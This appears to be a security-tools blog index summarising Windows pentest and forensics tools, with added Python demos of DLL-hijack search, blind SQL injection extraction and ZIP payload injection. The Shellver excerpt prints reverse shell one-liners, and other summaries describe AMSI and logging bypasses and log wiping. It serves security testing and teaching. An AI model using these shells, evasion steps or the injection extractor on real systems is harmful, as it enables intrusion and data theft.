Posts

Showing posts with the label Windows

BlobRunner - Quickly Debug Shellcode Extracted During Malware Analysis

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis. BlobRunner allocates memory for the target file and jumps to the base (or offset) of the allocated memory. This allows an analyst to quickly debug into extracted artifacts with minimal overhead and effort. To use BlobRunner, you can download the compiled executable from the releases page or build your own using the steps below. Building: Building the executable is straightforward and relatively painless. Requirements: Download and install Microsoft Visual C++ Build Tools or Visual Studio. Build Steps: Open a Visual Studio Command Prompt, navigate to the directory where BlobRunner is checked out, and build the executable by running: cl blobrunner.c. Building BlobRunner x64: Building the x64 version is almost the same as above, but just uses the x64 tooling. Open the x64 Visual Studio Command Prompt...

Robber - Tool For Finding Executables Prone To DLL Hijacking

Robber is a free open source tool developed using Delphi XE2 without any third party dependencies. What is DLL hijacking?! Windows has a search path for DLLs in its underlying architecture. If you can figure out which DLLs an executable requests without an absolute path (triggering this search process), you can then place your hostile DLL somewhere above the legitimate copy in the search path so it is found before the real version is, and Windows will happily feed your attack code to the application. So, let's pretend Windows's DLL search path looks something like this: A) . <-- current working directory of the executable, highest priority, first check B) \Windows C) \Windows\system32 D) \Windows\syswow64 <-- lowest priority, last check (this is the legacy order; with SafeDllSearchMode enabled, the default on supported Windows versions, the application's own directory is searched first and the current working directory is moved behind the system directories, but the hijacking logic is the same) and some executable "Foo.exe" requests "bar.dll", which happens to live ...
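
As an added illustration of the check Robber automates (this is example code written for this page, not Robber's own Delphi source): given a DLL name and a search order, find where the loader would pick the library up and which directories ahead of that copy the current user can write to. It builds a throwaway directory tree mirroring the post's A)..D) order in a temp folder; the directory names, the `bar.dll`/`missing.dll` names and the search order are assumptions for the demo, and the `os.access` writability test stands in for the ACL check a real audit would do on Windows.

```python
import os
import tempfile

# Search order as the post sketches it (legacy order with the working directory first).
# Under SafeDllSearchMode the application directory comes first and the working directory
# drops behind the system directories, but the same "writable and earlier" check applies.


def resolve_dll(dll_name, search_order):
    """Return the path the loader would use: the first directory in order that has the file."""
    for directory in search_order:
        candidate = os.path.join(directory, dll_name)
        if os.path.isfile(candidate):
            return candidate
    return None


def hijack_candidates(dll_name, search_order):
    """Return (legitimate_path, [writable directories searched before it]).

    A DLL the loader never finds at all is the best case for an attacker: every writable
    directory in the search order then becomes a planting location, so all are returned.
    """
    legitimate = resolve_dll(dll_name, search_order)
    candidates = []
    for directory in search_order:
        if legitimate is not None and os.path.join(directory, dll_name) == legitimate:
            break  # everything after this point is searched too late to matter
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            candidates.append(directory)
    return legitimate, candidates


def demo():
    """Constructed sample tree mimicking the post's A)..D) order (assumed names, temp folder)."""
    root = tempfile.mkdtemp(prefix="dllsearch-")
    app_dir = os.path.join(root, "app")            # A) working directory of Foo.exe
    windows = os.path.join(root, "Windows")        # B)
    system32 = os.path.join(windows, "system32")   # C)
    syswow64 = os.path.join(windows, "syswow64")   # D)
    for d in (app_dir, system32, syswow64):
        os.makedirs(d)
    with open(os.path.join(system32, "bar.dll"), "wb") as f:
        f.write(b"real bar.dll")
    order = [app_dir, windows, system32, syswow64]

    legitimate, before = hijack_candidates("bar.dll", order)
    # Plant a hostile copy in the higher-priority application directory and resolve again.
    with open(os.path.join(app_dir, "bar.dll"), "wb") as f:
        f.write(b"hostile bar.dll")
    after = resolve_dll("bar.dll", order)
    _, missing = hijack_candidates("missing.dll", order)
    return {
        "legitimate": legitimate,
        "candidates_before_plant": before,
        "resolved_after_plant": after,
        "missing_dll_candidates": missing,
        "system32": system32,
        "app_dir": app_dir,
        "order": order,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Robber does the first half of this (finding the DLL names an executable imports without a full path) by reading the PE import table; the resolution step above is what turns that list into an actionable finding.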

Sqlmap v1.2.11 - Automatic SQL Injection And Database Takeover Tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches spanning from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Features: Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. Support to directly connect to the data...
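
A worked example of one of the six techniques, boolean-based blind, added here and not taken from sqlmap: an in-memory SQLite table stands in for the target, a deliberately vulnerable lookup is the true/false oracle, and the extractor recovers a column value character by character with a binary search over the code point. The `users` table, the `admin` row and the payload shape are constructed for the demo; sqlmap's real payloads and its other techniques differ, and the parameterized lookup at the end shows the fix.

```python
import sqlite3


def make_db():
    """In-memory SQLite stand-in for the target database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


class VulnerableApp:
    """Deliberately vulnerable: the id parameter is concatenated into the query.

    All the attacker observes is whether a user row came back (page rendered or not),
    which is exactly the one-bit oracle boolean-based blind injection works from.
    """

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def user_exists(self, user_id):
        self.queries += 1
        sql = "SELECT name FROM users WHERE id = " + str(user_id)
        return self.conn.execute(sql).fetchone() is not None


class FixedApp:
    """Same endpoint with a bound parameter: the payload is a value, never parsed as SQL."""

    def __init__(self, conn):
        self.conn = conn

    def user_exists(self, user_id):
        row = self.conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
        return row is not None


def blind_extract(oracle, expression, max_len=64):
    """Recover the result of a scalar SQL expression through a true/false oracle,
    binary-searching each character's code point (7 probes per character)."""
    probe = "1 AND unicode(substr(({expr}), {pos}, 1)) > {n}"
    result = ""
    for pos in range(1, max_len + 1):
        # substr() past the end yields '' and unicode('') is NULL, so this probe is false
        # once the string is exhausted; that is the termination condition.
        if not oracle(probe.format(expr=expression, pos=pos, n=0)):
            break
        lo, hi = 1, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(probe.format(expr=expression, pos=pos, n=mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def run_demo():
    conn = make_db()
    app = VulnerableApp(conn)
    secret = blind_extract(app.user_exists, "SELECT password FROM users WHERE name = 'admin'")
    # With a bound parameter the same kind of payload is just text that matches no integer id.
    fixed_bypassed = FixedApp(conn).user_exists("1 AND 1=1")
    return {"secret": secret, "queries": app.queries, "fixed_bypassed": fixed_bypassed}


if __name__ == "__main__":
    print(run_demo())
```

The query count is the practical cost of this technique: roughly eight requests per recovered character, which is why sqlmap prefers error-based or UNION extraction whenever the target allows it and falls back to blind methods only when it must.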

AES-Killer v3.0 - Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly

Burp Suite plugin to decrypt AES encrypted traffic on the fly. Requirements: Burp Suite, Java. Tested on Burp Suite 1.7.36, Windows 10, Xubuntu 18.04, Kali Linux 2018. What it does: The IProxyListener decrypts requests and encrypts responses, and an IHttpListener then encrypts requests and decrypts responses. Burp sees the decrypted traffic, including Repeater, Intruder and Scanner, but the client/mobile app and server see the encrypted version. NOTE: Currently supports AES/CBC/PKCS5Padding encryption/decryption. How it works: Requires the AES encryption key (can be obtained by using a Frida script or reversing the mobile app). Requires the AES initialization vector (can be obtained by using a Frida script or reversing the mobile app). Request Parameter (leave blank in case of whole request body). Response Parameter (leave blank in case of whole response body). Characters separated with spaces for obfuscation on request/...

Invisi-Shell - Hide Your PowerShell Script In Plain Sight (Bypass All PowerShell Security Features)

Hide your PowerShell script in plain sight! Invisi-Shell bypasses all of PowerShell's security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .NET assemblies. The hook is performed via the CLR Profiler API. Work In Progress: This is still a preliminary version intended as a POC. The code works only on x64 processes and was tested against PowerShell v5.1. Usage: Copy the compiled InvisiShellProfiler.dll from the /x64/Release/ folder along with the two batch files from the root directory (RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat) to the same folder. Run either of the batch files (depending on whether you have local admin privileges or not). A PowerShell console will run. Exit PowerShell using the exit command (DON'T CLOSE THE WINDOW) to let the batch file perform proper cleanup. Compilation: The project was created with Visual Studio 2013. You should in...

AutoRDPwn v4.5 - The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on demand. For its correct operation, it is necessary to comply with the requirements described in the user guide. Requirements: PowerShell 5.0 or higher. Changes in version 4.5: • New ninja-style icon! • Automatic cleaning of PowerShell history after execution • Now all dependencies are downloaded from the same repository • Many errors and bugs fixed • UAC & AMSI bypass on 64-bit systems • New module available: Remote Desktop Caching • New module available: Disable system logs (Invoke-Phant0m) • New module available: Sticky Keys Hacking • New module available: Remote Desktop History • New attack available: Session Hijacking (passwordless) WARNING! This attack is very ...

CAINE 10.0 - GNU/Linux Live Distribution For Digital Forensics Project, Windows Side Forensics And Incident Response

CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project. Currently, the project manager is Nanni Bassetti (Bari - Italy). CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface. The main design objectives that CAINE aims to guarantee are the following: an interoperable environment that supports the digital investigator during the four phases of the digital investigation; a user-friendly graphical interface; user-friendly tools. CAINE fully represents the spirit of the Open Source philosophy because the project is completely open: everyone could take on the legacy of the previous developer or project manager. The distro is open source, the Windows side is freeware and, last but not least, the distro is installable, thus giving t...

Shellver - Reverse Shell Cheat Sheet Tool

Reverse Shell Cheat Sheet Tool. Install Note: Clone the repository: git clone https://github.com/0xR0/shellver.git Then go inside: cd shellver/ Then install it: python setup.py -i Run shellver -h or "shellver bash or perl {} python {} php {} ruby {} netcat {} xterm {} shell {} all".format (or) Example: shellver python, shellver all. From https://github.com/swisskyrepo Reverse Shell Methods. Reverse Shell Cheat Sheet: Bash TCP: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 Bash UDP: Victim: sh -i >& /dev/udp/127.0.0.1/4242 0>&1 Listener: nc -u -lvp 4242 Perl: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&...

ZIP File Raider - Burp Extension For ZIP File Payload Testing

ZIP File Raider is a Burp Suite extension for attacking web applications with ZIP file upload functionality. You can easily inject Burp Scanner/Repeater payloads into the ZIP content of HTTP requests, which is not possible by default. This extension helps to automate the extraction and compression steps. This software was created by Natsasit Jirathammanuwat during a cooperative education course at King Mongkut's University of Technology Thonburi (KMUTT). Installation: Set up the Jython standalone Jar in Extender > Options > Python Environment > "Select file...". Add the ZIP File Raider extension in Extender > Extensions > Add > CompressedPayloads.py (Extension type: Python). How to use: Send the HTTP request with a compressed file to ZIP File Raider. First, right click on the HTTP request with a compressed file in the HTTP body and then select "Sen...
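
An added example, not ZIP File Raider's code, of the extract, replace, recompress step the extension automates: take the ZIP bytes out of the request body, rewrite one entry with a payload, copy every other entry through unchanged, and hand back an archive that still parses server-side. The sample archive, its entry names and the payloads are constructed for the demo; the HTTP transport around it is left out, and `fuzz_every_entry` goes one step beyond the post by producing one archive per entry, which is what an Intruder-style sweep over the archive would send.

```python
import io
import zipfile


def build_sample_zip():
    """Constructed upload as a web app might receive it: a manifest plus a config file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.txt", "name=demo\nversion=1\n")
        zf.writestr("config/settings.xml", "<settings><mode>prod</mode></settings>")
    return buf.getvalue()


def list_entries(zip_bytes):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [info.filename for info in zf.infolist()]


def read_entry(zip_bytes, entry_name):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(entry_name)


def inject_payload(zip_bytes, entry_name, payload):
    """Rewrite one entry with the payload and copy the rest through with their metadata,
    so the server still sees a well-formed archive with the expected file list."""
    if isinstance(payload, str):
        payload = payload.encode()
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        names = [info.filename for info in src.infolist()]
        if entry_name not in names:
            raise KeyError(f"{entry_name!r} not in archive: {names}")
        for info in src.infolist():
            if info.filename == entry_name:
                dst.writestr(info.filename, payload)
            else:
                dst.writestr(info, src.read(info.filename))  # ZipInfo keeps the original timestamps
    return out.getvalue()


def fuzz_every_entry(zip_bytes, payload):
    """One archive per entry, each with that single entry replaced by the payload."""
    return {name: inject_payload(zip_bytes, name, payload) for name in list_entries(zip_bytes)}


if __name__ == "__main__":
    original = build_sample_zip()
    mutated = inject_payload(original, "config/settings.xml", "<settings><mode>' OR 1=1--</mode></settings>")
    print(list_entries(mutated), read_entry(mutated, "config/settings.xml"))
```

Keeping the entry list and compression method identical between the original and the mutated archive matters: servers that validate the manifest or count entries before extracting will reject an archive that gained or lost files, and then the payload is never reached.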

Sheepl - Creating Realistic User Behaviour For Supporting Tradecraft Development Within Lab Environments

Sheepl: Creating realistic user behaviour for supporting tradecraft development within lab environments. Introduction: There are lots of resources available online relating to how you can set up AD network environments for the development of blue team and red team tradecraft. However, the current solutions tend to lack one important aspect in representing real world network configurations. A network is not just a collection of static endpoints, it is a platform for communication between people. Sheepl is a tool that aims to bridge the gap by emulating the behaviour that people normally undertake within a network environment. Using Python3 and AutoIT3 the output can be compiled into a standalone executable without any other dependencies that, when executed on a Windows endpoint, executes a set of tasks randomly over a chosen time frame. For red teamers this can serve to introduce those moments of opportunity t...

TIDoS-Framework v1.7 - The Offensive Manual Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. Let's keep this simple. Highlights: The main highlights of this framework are: TIDoS Framework now boasts a century+ of modules. A complete, versatile framework to cover everything from Reconnaissance to Vulnerability Analysis. Has five main phases, subdivided into 14 sub-phases consisting of a total of 104 modules. Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules). Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc). Vulnerability Analysis Phase has 36 modules (including most common vulnerabilities in action). Exploits Castle has only 1 exploit (purely developmental). And finally, Auxiliaries have got 4 modules, under development. All four phases each have an Auto-Awesome module which automates every module for you. You just need the domain, and ...

MCExtractor - Intel, AMD, VIA & Freescale Microcode Extraction Tool

Intel, AMD, VIA & Freescale Microcode Extraction Tool. MC Extractor News Feed. MC Extractor Discussion Topic. Intel, AMD & VIA CPU Microcode Repositories. A. About MC Extractor: MC Extractor is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc. It is capable of converting Intel microcode containers (dat, inc, h, txt) to binary images for BIOS integration, detecting new/unknown microcodes, checking microcode health, Updated/Outdated status and more. MC Extractor can also be used as a research analysis tool with multiple structures which allow, among others, full parsing & information display of all microcode headers, documented or not. Moreover, with the help of its extensive database, MC Extractor is capable of uniquely categorizing all su...
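
As an added example (not MC Extractor's code) of what parsing an Intel microcode binary involves: the 48-byte update header laid out in the Intel SDM's microcode update format (header version, update revision, BCD date, processor signature, checksum, loader revision, processor flags, data size, total size, reserved), the zero-means-legacy-size rule for the two size fields, and the checksum rule that every dword of the update must sum to zero modulo 2^32. The builder produces a constructed test vector with made-up CPUID, platform, revision and date values rather than real Intel microcode; the parser reports the fields MC Extractor lists and the health check it performs.

```python
import struct

# Intel microcode update header: nine little-endian dwords followed by 12 reserved bytes.
HEADER = struct.Struct("<9I12s")
HEADER_SIZE = HEADER.size  # 48
MASK32 = 0xFFFFFFFF


def _to_bcd(value):
    """2020 -> 0x2020: each decimal digit becomes one hex nibble."""
    return int(str(value), 16)


def _from_bcd(value):
    """0x2020 -> 2020."""
    return int(f"{value:x}")


def build_intel_microcode(revision, cpuid, platform, year, month, day, data):
    """Assemble header + data with a valid checksum. Constructed test vector, not real microcode."""
    if len(data) % 4:
        raise ValueError("data must be a multiple of 4 bytes")
    date = (_to_bcd(month) << 24) | (_to_bcd(day) << 16) | _to_bcd(year)  # MMDDYYYY in BCD
    total_size = HEADER_SIZE + len(data)
    fields = [1, revision, date, cpuid, 0, 1, platform, len(data), total_size]
    blob = HEADER.pack(*fields, b"\0" * 12) + data
    # Checksum rule: all dwords of the update sum to zero, so the field absorbs the negated sum.
    running = sum(struct.unpack(f"<{total_size // 4}I", blob)) & MASK32
    fields[4] = (-running) & MASK32
    return HEADER.pack(*fields, b"\0" * 12) + data


def parse_intel_microcode(blob):
    """Report what MC Extractor lists (CPUID, platform, revision, date, sizes) and check health."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("too short for a microcode header")
    (hdr_ver, revision, date, cpuid, checksum, loader_rev,
     platform, data_size, total_size, _reserved) = HEADER.unpack_from(blob)
    if hdr_ver != 1:
        raise ValueError(f"unsupported header version {hdr_ver:#x}")
    # A zero in either size field means the legacy fixed layout: 2000 data bytes, 2048 total.
    data_size = data_size or 2000
    total_size = total_size or 2048
    if total_size % 4 or total_size > len(blob) or total_size < HEADER_SIZE + data_size:
        raise ValueError("size fields inconsistent with blob length")
    words = struct.unpack_from(f"<{total_size // 4}I", blob)
    year = _from_bcd(date & 0xFFFF)
    month = _from_bcd((date >> 24) & 0xFF)
    day = _from_bcd((date >> 16) & 0xFF)
    return {
        "cpuid": cpuid,
        "platform": platform,
        "revision": revision,
        "date": f"{year:04d}-{month:02d}-{day:02d}",
        "loader_revision": loader_rev,
        "data_size": data_size,
        "total_size": total_size,
        "checksum": checksum,
        "checksum_ok": (sum(words) & MASK32) == 0,
    }


if __name__ == "__main__":
    sample = build_intel_microcode(revision=0xD6, cpuid=0x406E3, platform=0xC0,
                                   year=2020, month=4, day=20, data=bytes(range(64)))
    for key, value in parse_intel_microcode(sample).items():
        print(f"{key}: {value:#x}" if isinstance(value, int) else f"{key}: {value}")
```

Real updates carry an encrypted body and, optionally, an extended signature table after the data that the same zero-sum rule covers; the platform field is a bitmask of supported platform IDs, which is why a single CPUID can have several valid microcode files and why MC Extractor keys its database on both values.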